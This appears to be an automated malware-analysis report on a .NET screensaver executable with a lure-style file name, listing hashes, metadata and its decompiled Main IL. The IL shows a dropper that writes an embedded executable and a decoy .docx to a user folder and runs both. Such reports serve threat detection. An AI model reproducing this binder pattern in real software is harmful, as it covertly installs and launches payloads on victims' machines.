7cb4d7369fc1e8c34a960cbe326df323

PE Executable
|
MD5: 7cb4d7369fc1e8c34a960cbe326df323
|
Size: 909.31 KB
|
application/x-dosexec

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	7cb4d7369fc1e8c34a960cbe326df323
Sha1	c52ae828e01f0a5416c971ad8e1ccdc337a50081
Sha256	7e67ca62a4743801afd4328a7ff558c84d76a09844b823ed1bb2de3de82d59ab
Sha384	1c428941a8a2a2866bdf49962cbb41665bd78b797d0bef27ee4118c14b8e47ffb48828d5e94f944c6b99a2827603d5b6
Sha512	66e4ccd0000acc9f69aa0d8125b42f509e5a222619b5e9dcc0a3d6322779f62c24e63b3505d9cf242c0b558fb27c357f77daaf316214340d1b45c3d3b491ba98
SSDeep	6144:ax6V1dz+PR6Cc4lhjU3ayN4s3wOpVM0pJ0Q+OGJfXgXsDiaZu0Ic2p7J94+OXRy3:aM0Vc43ZyNU0XJjGJfX3+zBSQqiChl
TLSH	161517D1D98440A0EC2A9F3480721D35A1777FA9FFBCB28B6E5176662B731D2643A703

PeID

.NET executable

Microsoft Visual C# / Basic .NET

Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL

Microsoft Visual C# v7.0 / Basic .NET

Microsoft Visual C++ v6.0 DLL

Microsoft Visual Studio .NET

File Structure

Informations

Name0	Value
Info	PE Detect: PeReader OK (file layout)
Module Name	46岁的老鲫鱼首冲3万.Scr
Full Name	46岁的老鲫鱼首冲3万.Scr
EntryPoint	System.Void Bound.Open::Main()
Scope Name	46岁的老鲫鱼首冲3万.Scr
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v2.0.50727
Tables Header Version	512
WinMD Version	<null>
Assembly Name	46岁的老鲫鱼首冲3万
Assembly Version	0.0.0.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	<null>
Total Strings	7
Main Method	System.Void Bound.Open::Main()
Main IL Instruction Count	43
Main IL	ldstr files call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.0 <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr _ZjyYHX_Hp.exe call System.String System.String::Concat(System.String,System.String) ldloc.0 <null> ldstr QplRhmKMON callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr _ZjyYHX_Hp.exe call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr CPxTQiAzec.docx call System.String System.String::Concat(System.String,System.String) ldloc.0 <null> ldstr dyozSCHUMr callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr CPxTQiAzec.docx call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_00A0: ret stloc.1 <null> ldloc.1 <null> callvirt System.String System.Exception::get_Message() call System.Void System.Console::WriteLine(System.String) call System.Int32 System.Console::Read() pop <null> leave.s IL_00A0: ret ret <null>
Module Name	46岁的老鲫鱼首冲3万.Scr
Full Name	46岁的老鲫鱼首冲3万.Scr
EntryPoint	System.Void Bound.Open::Main()
Scope Name	46岁的老鲫鱼首冲3万.Scr
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v2.0.50727
Tables Header Version	512
WinMD Version	<null>
Assembly Name	46岁的老鲫鱼首冲3万
Assembly Version	0.0.0.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	<null>
Total Strings	7
Main Method	System.Void Bound.Open::Main()
Main IL Instruction Count	43
Main IL	ldstr files call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.0 <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr _ZjyYHX_Hp.exe call System.String System.String::Concat(System.String,System.String) ldloc.0 <null> ldstr QplRhmKMON callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr _ZjyYHX_Hp.exe call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr CPxTQiAzec.docx call System.String System.String::Concat(System.String,System.String) ldloc.0 <null> ldstr dyozSCHUMr callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr CPxTQiAzec.docx call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_00A0: ret stloc.1 <null> ldloc.1 <null> callvirt System.String System.Exception::get_Message() call System.Void System.Console::WriteLine(System.String) call System.Int32 System.Console::Read() pop <null> leave.s IL_00A0: ret ret <null>

7cb4d7369fc1e8c34a960cbe326df323 (909.31 KB)

7cb4d7369fc1e8c34a960cbe326df323

PE Executable | MD5: 7cb4d7369fc1e8c34a960cbe326df323 | Size: 909.31 KB | application/x-dosexec

PE Executable
|
MD5: 7cb4d7369fc1e8c34a960cbe326df323
|
Size: 909.31 KB
|
application/x-dosexec